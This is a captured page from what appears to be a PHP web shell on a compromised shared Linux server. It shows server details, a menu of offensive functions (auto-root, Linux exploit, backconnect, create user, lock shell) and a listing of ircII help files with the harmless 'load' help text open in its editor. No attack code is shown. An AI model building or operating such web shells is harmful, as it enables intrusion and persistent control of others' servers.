Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.171
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
ircII /
help /
load /
[ HOME SHELL ]
Name
Size
Permission
Action
2.9script
355
B
-rw-r--r--
action
1.83
KB
-rw-r--r--
alias
1.79
KB
-rw-r--r--
autoop
1.6
KB
-rw-r--r--
autoquery
633
B
-rw-r--r--
basical
1.12
KB
-rw-r--r--
bigcheese
504
B
-rw-r--r--
brc
3.29
KB
-rw-r--r--
channel
417
B
-rw-r--r--
columns
419
B
-rw-r--r--
commander
1.91
KB
-rw-r--r--
cursor
511
B
-rw-r--r--
dccchan
862
B
-rw-r--r--
deutsch
729
B
-rw-r--r--
disc
543
B
-rw-r--r--
edit
648
B
-rw-r--r--
english
918
B
-rw-r--r--
events
832
B
-rw-r--r--
extensions
468
B
-rw-r--r--
finger
647
B
-rw-r--r--
finger.who
474
B
-rw-r--r--
flood
499
B
-rw-r--r--
fnet
1.24
KB
-rw-r--r--
functions
1.56
KB
-rw-r--r--
help
410
B
-rw-r--r--
history
663
B
-rw-r--r--
icb
1.6
KB
-rw-r--r--
irciihelp
473
B
-rw-r--r--
ircprimer
3.14
KB
-rw-r--r--
kickmenu
425
B
-rw-r--r--
killpath
592
B
-rw-r--r--
kpstat
513
B
-rw-r--r--
list
328
B
-rw-r--r--
listidle
308
B
-rw-r--r--
load
2.03
KB
-rw-r--r--
local
678
B
-rw-r--r--
lynx_ircrc
1.02
KB
-rw-r--r--
meta1
723
B
-rw-r--r--
meta2
345
B
-rw-r--r--
msg
884
B
-rw-r--r--
mudlike
1.17
KB
-rw-r--r--
nemesis
938
B
-rw-r--r--
netsplit
988
B
-rw-r--r--
newaway
342
B
-rw-r--r--
nicks
516
B
-rw-r--r--
oldping
799
B
-rw-r--r--
oper
898
B
-rw-r--r--
prefix
439
B
-rw-r--r--
recursion
823
B
-rw-r--r--
repeat
917
B
-rw-r--r--
screen
901
B
-rw-r--r--
service
808
B
-rw-r--r--
shell
647
B
-rw-r--r--
silent
644
B
-rw-r--r--
smileys
446
B
-rw-r--r--
suggestions
582
B
-rw-r--r--
tabkey
1.08
KB
-rw-r--r--
time
439
B
-rw-r--r--
traces
371
B
-rw-r--r--
troy
415
B
-rw-r--r--
uhnotify
406
B
-rw-r--r--
version
385
B
-rw-r--r--
wallopstat
739
B
-rw-r--r--
whowas
352
B
-rw-r--r--
window
704
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : load
! $eterna: load,v 1.7 2018/06/10 08:17:41 mrg Exp $ ! ! Copyright (c) 1990-2018 Michael Sandrof, Troy Rollo, Matthew Green, ! and other ircII contributors. ! ! All rights reserved. See the HELP IRCII COPYRIGHT file for more ! information. ! Usage: LOAD [-args] <filename> [<arg0> <arg1> ...] Loads the given file into irc, treating each line as an irc command, just as if it were typed into the command line, but it expects commands to not have leading command characters, for compatibility it is however allowed. LOAD is the command used automatically at irc startup to load the .ircrc file. In a LOAD script it is allowed to have leading spaces and tabs before the commands. A long line, like a long alias definition, can be split over multiple lines by putting { and } around it like this: alias follow { say sorry folks, got invited away join -i;bow say here i am especially for you grin } This format _MUST_ be used, you cannot put the { in the next line and you cannot put the } elsewhere than by itself. It is also not allowed to use { { } } constructs. If the -args flag is specified, then each line of the loaded file is alias expanded before it is executed, just as if you had INPUT_ALIASES set to ON. The optional arguments, arg0 arg1 etc, are then used to expand the argument expandos ($*, $1, $2, etc) for each line. The -args switch takes precedent over any changes of the setting of INPUT_ALIASES in the loaded file. If you only want to expand certain lines and not others, use EVAL to evaluate the given line expanding variables. The default value for INPUT_ALIASES is now OFF when loading a script. Note also that the default value for DISPLAY is OFF as well. Commands separated by ';' are not recognized by LOAD, that syntax is for ALIAS, BIND and ON only. The location of scripts should be shown in your LOAD_PATH variable which can be changed to point to your own scripts if needed. See Also: SET INPUT_ALIASES SET LOAD_PATH CD
Close